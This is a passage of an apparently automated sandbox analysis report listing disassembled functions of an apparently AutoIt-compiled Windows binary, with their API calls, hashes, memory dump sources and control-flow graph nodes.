                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bcce6ed9dc10cd3a7180748a147970e8cae6961c2e462daa192dc8a32e2d05a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27E04631105209AFCF11BF61CD08A683FABEB80386F006418FA0CAA162CB35ED42CB81
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00E7FF9F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateSnapshotToolhelp32
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3332741929-0
                                                                                                                                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                      • Instruction ID: a7cca8575476c9384c3f58a31921f7b99fb3c6d967d1a13380e7ab414421f5df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6310471B00105DBC718CF58D484969FBA2FF4A314B68E6A5E409EB655EB30EDC1CBC0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InputStateTimetime
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2164325655-0
                                                                                                                                                                                                                                      • Opcode ID: c5ad7ad08eb3d6d1f1499f08b54eea0ed8d8f726c21ebc453cb61c561a798ec9
                                                                                                                                                                                                                                      • Instruction ID: d7873c53d8daf0272c9d564b76605b6aaf83b8267a9fa0bd4a83b0ec74dba374
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5ad7ad08eb3d6d1f1499f08b54eea0ed8d8f726c21ebc453cb61c561a798ec9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77423230B48341DFD728CF24DC45BAABBE1BF81348F54651DE56AA72A1D771E848CB82
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 243 e64e28-e64e97 call e6addd GetVersionExW call e673e7 248 e64e9d 243->248 249 ea3f95-ea3fa8 243->249 250 e64e9f-e64ea1 248->250 251 ea3fa9-ea3fad 249->251 252 e64ea7-e64f06 call e68645 call e66925 250->252 253 ea3fd4 250->253 254 ea3faf 251->254 255 ea3fb0-ea3fbc 251->255 268 e64f0c-e64f0e 252->268 269 ea4136-ea413d 252->269 258 ea3fdb-ea3fe7 253->258 254->255 255->251 257 ea3fbe-ea3fc0 255->257 257->250 260 ea3fc6-ea3fcd 257->260 261 e64f7c-e64f96 GetCurrentProcess IsWow64Process 258->261 260->249 263 ea3fcf 260->263 265 e64ff5-e64ffb 261->265 266 e64f98 261->266 263->253 267 e64f9e-e64faa 265->267 266->267 270 ea417b-ea417f GetSystemInfo 267->270 271 e64fb0-e64fbf LoadLibraryA 267->271 272 e64f14-e64f17 268->272 273 ea4037-ea404a 268->273 274 ea413f 269->274 275 ea415d-ea4160 269->275 276 e64fc1-e64fcf GetProcAddress 271->276 277 e64ffd-e65007 GetSystemInfo 271->277 272->261 278 e64f19-e64f5b 272->278 279 ea404c-ea4055 273->279 280 ea4073-ea4075 273->280 281 ea4145 274->281 282 ea414b-ea4153 275->282 283 ea4162-ea4171 275->283 276->277 285 e64fd1-e64fd5 GetNativeSystemInfo 276->285 286 e64fd7-e64fd9 277->286 278->261 287 e64f5d-e64f60 278->287 288 ea4062-ea406e 279->288 289 ea4057-ea405d 279->289 290 ea40aa-ea40ad 280->290 291 ea4077-ea408c 280->291 281->282 282->275 283->281 284 ea4173-ea4179 283->284 284->282 285->286 294 e64fe2-e64ff4 286->294 295 e64fdb-e64fdc FreeLibrary 286->295 296 e64f66-e64f70 287->296 297 ea3fec-ea3ff6 287->297 288->261 289->261 292 ea40e8-ea40eb 290->292 293 ea40af-ea40ca 290->293 298 ea4099-ea40a5 291->298 299 ea408e-ea4094 291->299 292->261 304 ea40f1-ea4118 292->304 300 ea40cc-ea40d2 293->300 301 ea40d7-ea40e3 293->301 295->294 296->258 305 e64f76 296->305 302 ea3ff8-ea4004 297->302 303 ea4009-ea4013 297->303 298->261 299->261 300->261 301->261 302->261 306 ea4026-ea4032 303->306 307 ea4015-ea4021 303->307 308 ea411a-ea4120 304->308 309 ea4125-ea4131 304->309 305->261 306->261 307->261 308->261 309->261
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00E64E57
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00EFDC40,00000000,?,?), ref: 00E64F83
                                                                                                                                                                                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00E64F8A
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00E64FB5
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E64FC7
                                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00E64FD5
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E64FDC
                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00E65001
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64
                                                                                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                      • API String ID: 2834427828-3101561225
                                                                                                                                                                                                                                      • Opcode ID: 30ce4dba45b31e410cfa7405a8ec110b685361eca34585973344ae2f742cef76
                                                                                                                                                                                                                                      • Instruction ID: 97033dfcd84b6c0cc10c61ce6d282de9e0997dac1c406ea8fe552b7ba306f246
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30ce4dba45b31e410cfa7405a8ec110b685361eca34585973344ae2f742cef76
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4A1937190A2D8CFC791CBBC7C401E97FA76B7A364B046899E481B72A1D77C4548EB32
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E62571
                                                                                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00E6259B
                                                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E625AC
                                                                                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00E625C9
                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E625D9
                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A9), ref: 00E625EF
                                                                                                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E625FE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                      • Opcode ID: f30ff999581ca04819800a8adf2f178de23cd8bd2bf513c498b487acd0f39c84
                                                                                                                                                                                                                                      • Instruction ID: 85dd793fd47cef8cfb851ae9637904258e63db73e2c89e4be5829202439c5fac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f30ff999581ca04819800a8adf2f178de23cd8bd2bf513c498b487acd0f39c84
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C221E4B190520CAFDB409F95EC49BADBFB6FB48710F10811AE611B62A0D7B45544EF94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E623F8
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00E62407
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00E6241D
                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A4), ref: 00E6242F
                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A2), ref: 00E62441
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E62459
                                                                                                                                                                                                                                      • RegisterClassExW.USER32(?), ref: 00E624AA
                                                                                                                                                                                                                                        • Part of subcall function 00E6253E: GetSysColorBrush.USER32(0000000F), ref: 00E62571
                                                                                                                                                                                                                                        • Part of subcall function 00E6253E: RegisterClassExW.USER32(00000030), ref: 00E6259B
                                                                                                                                                                                                                                        • Part of subcall function 00E6253E: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E625AC
                                                                                                                                                                                                                                        • Part of subcall function 00E6253E: InitCommonControlsEx.COMCTL32(?), ref: 00E625C9
                                                                                                                                                                                                                                        • Part of subcall function 00E6253E: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E625D9
                                                                                                                                                                                                                                        • Part of subcall function 00E6253E: LoadIconW.USER32(000000A9), ref: 00E625EF
                                                                                                                                                                                                                                        • Part of subcall function 00E6253E: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E625FE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                      • Opcode ID: fab7514ac643d005ee6bb94e2b7a65ba3da6ed1f4294b1830118accf6b810de2
                                                                                                                                                                                                                                      • Instruction ID: 77754ca4ae3c49598975fd49aba91b1e14136e35e139b33eefa9aa52dfd9bfd3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fab7514ac643d005ee6bb94e2b7a65ba3da6ed1f4294b1830118accf6b810de2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80213A71D0031CAFDB509FA5EC55AA9BFB6FB48B60F10401AE604B63A0D7B90544EF90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 429 ee0db4-ee0deb call e6d510 432 ee0ded-ee0dfa call e6b7fd 429->432 433 ee0e0b-ee0e1d WSAStartup 429->433 432->433 444 ee0dfc-ee0e07 call e6b7fd 432->444 434 ee0e1f-ee0e2d 433->434 435 ee0e50-ee0e8d call e67e72 call e67d90 call e7fabb inet_addr gethostbyname 433->435 437 ee0e2f 434->437 438 ee0e32-ee0e42 434->438 452 ee0e9e-ee0eac 435->452 453 ee0e8f-ee0e9c IcmpCreateFile 435->453 437->438 441 ee0e47-ee0e4b 438->441 442 ee0e44 438->442 445 ee1045-ee104d 441->445 442->441 444->433 455 ee0eae 452->455 456 ee0eb1-ee0ec1 452->456 453->452 454 ee0ecf-ee0efc call e8008b call e63257 453->454 465 ee0efe-ee0f25 IcmpSendEcho 454->465 466 ee0f27-ee0f44 IcmpSendEcho 454->466 455->456 457 ee0ec6-ee0eca 456->457 458 ee0ec3 456->458 460 ee103c-ee1040 call e67e4c 457->460 458->457 460->445 467 ee0f48-ee0f4a 465->467 466->467 468 ee0f4c-ee0f51 467->468 469 ee0faa-ee0fb8 467->469 472 ee0f57-ee0f5c 468->472 473 ee0ff4-ee1006 call e6d510 468->473 470 ee0fbd-ee0fc4 469->470 471 ee0fba 469->471 474 ee0fe0-ee0fe9 470->474 471->470 475 ee0f5e-ee0f63 472->475 476 ee0fc6-ee0fd4 472->476 484 ee100c 473->484 485 ee1008-ee100a 473->485 481 ee0fee-ee0ff2 474->481 482 ee0feb 474->482 475->469 483 ee0f65-ee0f6a 475->483 479 ee0fd9 476->479 480 ee0fd6 476->480 479->474 480->479 486 ee100e-ee1025 IcmpCloseHandle WSACleanup 481->486 482->481 487 ee0f8f-ee0f9d 483->487 488 ee0f6c-ee0f71 483->488 484->486 485->486 486->460 491 ee1027-ee1039 call e8004d call e80094 486->491 489 ee0f9f 487->489 490 ee0fa2-ee0fa8 487->490 488->476 492 ee0f73-ee0f81 488->492 489->490 490->474 491->460 493 ee0f86-ee0f8d 492->493 494 ee0f83 492->494 493->474 494->493
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WSAStartup.WS2_32(00000101,?), ref: 00EE0E15
                                                                                                                                                                                                                                      • inet_addr.WSOCK32(?), ref: 00EE0E75
                                                                                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00EE0E81
                                                                                                                                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 00EE0E8F
                                                                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EE0F1F
                                                                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EE0F3E
                                                                                                                                                                                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00EE1012
                                                                                                                                                                                                                                      • WSACleanup.WSOCK32 ref: 00EE1018
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                      • String ID: Ping
                                                                                                                                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                      • Opcode ID: 1aaed8b9009e497b02973e7e7d9dc6370ef2835e96519d2c3f5b77f89d9e5bd5
                                                                                                                                                                                                                                      • Instruction ID: 56bafcd825b7e62a08ef496abab12851c855fc4cf049402fcda83f84fa266b82
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1aaed8b9009e497b02973e7e7d9dc6370ef2835e96519d2c3f5b77f89d9e5bd5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D91A5316082419FD720DF16C884F1ABBE1FF84358F1499A9F469AB7A2C771ED85CB81
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 499 e62629-e6263e 500 e62640-e62643 499->500 501 e6269e-e626a0 499->501 503 e626a4 500->503 504 e62645-e6264c 500->504 501->500 502 e626a2 501->502 505 e62689-e62691 DefWindowProcW 502->505 506 ea2d82-ea2daa call e61eb7 call e7ece7 503->506 507 e626aa-e626af 503->507 508 e62652-e62657 504->508 509 e6271e-e62726 PostQuitMessage 504->509 515 e62697-e6269d 505->515 545 ea2daf-ea2db6 506->545 510 e626d6-e626fd SetTimer RegisterWindowMessageW 507->510 511 e626b1-e626b4 507->511 513 ea2e03-ea2e17 call ecc5e6 508->513 514 e6265d-e62661 508->514 516 e626d2-e626d4 509->516 510->516 520 e626ff-e6270a CreatePopupMenu 510->520 517 ea2d23-ea2d26 511->517 518 e626ba-e626cd KillTimer call e62810 call e647dd 511->518 513->516 540 ea2e1d 513->540 521 e62667-e6266c 514->521 522 ea2def-ea2df9 call ecc817 514->522 516->515 524 ea2d28-ea2d2c 517->524 525 ea2d5e-ea2d7d MoveWindow 517->525 518->516 520->516 529 e62672-e62677 521->529 530 ea2dd4-ea2ddb 521->530 536 ea2dfe 522->536 532 ea2d2e-ea2d31 524->532 533 ea2d4d-ea2d59 SetFocus 524->533 525->516 538 e6270c-e6271c call e62728 529->538 539 e6267d-e62683 529->539 530->505 534 ea2de1-ea2dea call ec1161 530->534 532->539 541 ea2d37-ea2d48 call e61eb7 532->541 533->516 534->505 536->516 538->516 539->505 539->545 540->505 541->516 545->505 549 ea2dbc-ea2dcf call e62810 call e62874 545->549 549->505
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00E62623,?,?), ref: 00E62691
                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00E62623,?,?), ref: 00E626BD
                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E626E0
                                                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00E62623,?,?), ref: 00E626EB
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00E626FF
                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00E62720
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                      • String ID: TaskbarCreated
                                                                                                                                                                                                                                      • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                      • Opcode ID: b384dcef9e23f2e967084936c02d092fa8fc8ab2479623ac5e132e6b2b17b5e3
                                                                                                                                                                                                                                      • Instruction ID: 3fa8379a0d60080b750648e42d1de685fb2752f460f7a29a2a62a4639b0dc11e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b384dcef9e23f2e967084936c02d092fa8fc8ab2479623ac5e132e6b2b17b5e3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A412830184509ABDB142B38FC4DBBD3A56EB453A8F04762EF701FA6E2CA759C40A765
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 779 e62b51-e62b74 780 ea31bf-ea31d2 call ec9f01 779->780 781 e62b7a-e62be3 call e8008b call e6688b call e6addd call e6688b * 2 call e65d82 779->781 788 ea31d9-ea31e1 780->788 815 ea35f1-ea3601 call ec9f01 781->815 816 e62be9-e62bf6 call e65bf3 call e65a37 781->816 789 ea31e3-ea31eb 788->789 790 ea31f1-ea31f9 788->790 789->790 792 e62c12-e62c81 call e6addd call e62b1e call e6addd call e6462f call e6327a call e65b1f 789->792 793 ea31fb-ea3202 790->793 794 ea3204-ea320c 790->794 830 ea323a-ea3245 792->830 831 e62c87-e62cf6 call e6addd * 2 call e657ec call e66a2c SetCurrentDirectoryW call e67e4c * 2 call e8008b call e63257 792->831 797 ea322c-ea3235 call ecd3b5 793->797 798 ea320e-ea3215 794->798 799 ea3217-ea321f 794->799 797->792 798->797 799->792 803 ea3225-ea3227 799->803 803->797 822 ea3606 815->822 826 e62bfb-e62c0c call e65a20 816->826 822->822 826->788 826->792 830->831 832 ea324b-ea327e call e6688b call e652f1 830->832 877 e62cfa-e62cff 831->877 842 ea3588-ea359f call ec9f01 832->842 843 ea3284-ea32ab call ed34c3 call e6535f 832->843 851 e62e53-e62e9e call e67e4c * 2 call e6688b call e67e4c call e6688b call e80094 842->851 843->842 857 ea32b1-ea332d call e8005b call e6ab1f call e6aa39 843->857 881 ea3333-ea3355 call e6ab1f 857->881 882 ea34f5-ea3531 call e6ab1f call ed1296 call ec480d call e84bfe 857->882 878 e62d05-e62d12 call e69cc4 877->878 879 e62e1f-e62e40 call e6688b SetCurrentDirectoryW 877->879 878->879 893 e62d18-e62d34 call e63144 call e630a4 878->893 879->851 894 e62e42-e62e50 call e8004d call e80094 879->894 897 ea336b-ea3376 call ed139c 881->897 898 ea3357-ea3366 881->898 926 ea3533-ea3558 call e64cc0 call e80094 call ed127e 882->926 923 e62d3a-e62d51 call e63069 call e84be3 893->923 924 ea35d4-ea35ec call ec9f01 893->924 894->851 909 ea3378-ea338e 897->909 910 ea3393-ea339e call ed1388 897->910 899 ea3487-ea349a call e6aa39 898->899 899->881 919 ea34a0-ea34aa 899->919 909->899 929 ea33a0-ea33af 910->929 930 ea33b4-ea33bf call e7e128 910->930 920 ea34ac-ea34ba 919->920 921 ea34dd call eca25d 919->921 920->921 927 ea34bc-ea34db call e63191 920->927 935 ea34e2-ea34ef 921->935 948 e62d74-e62d77 923->948 949 e62d53-e62d6e call e86645 923->949 924->879 926->851 927->935 929->899 930->899 944 ea33c5-ea33e1 call ec9ce4 930->944 935->881 935->882 959 ea33e3-ea340e call e6a1b9 call e67e4c 944->959 960 ea3410-ea3413 944->960 950 e62ea1-e62ea7 948->950 951 e62d7d-e62d82 948->951 949->948 949->950 950->951 958 e62ead-ea35b0 950->958 955 e62d88-e62dc1 call e6a1b9 call e62ec6 951->955 956 ea35b5-ea35bd call ec9bac 951->956 987 e62dc3-e62dda call e80094 call e8004d 955->987 988 e62dde-e62de0 955->988 981 ea35c2-ea35c5 956->981 958->951 1002 ea343c-ea344d call e6ab1f 959->1002 964 ea344f-ea3452 960->964 965 ea3415-ea343b call e6a1b9 call e66c5f call e67e4c 960->965 969 ea3473-ea3477 call ed1324 964->969 970 ea3454-ea345d call ec9c13 964->970 965->1002 982 ea347c-ea3486 call e80094 969->982 985 ea355d-ea3586 call ec9f01 call e80094 call e84bfe 970->985 986 ea3463-ea346e call e80094 970->986 989 e62eb6-e62ebe 981->989 990 ea35cb-ea35cf 981->990 982->899 985->926 986->881 987->988 1000 e62de6-e62de9 988->1000 1001 e62eb2 988->1001 997 e62e0c-e62e19 989->997 990->989 997->877 997->879 1000->989 1007 e62def-e62df2 1000->1007 1001->989 1002->982 1007->981 1011 e62df8-e62e07 call e63191 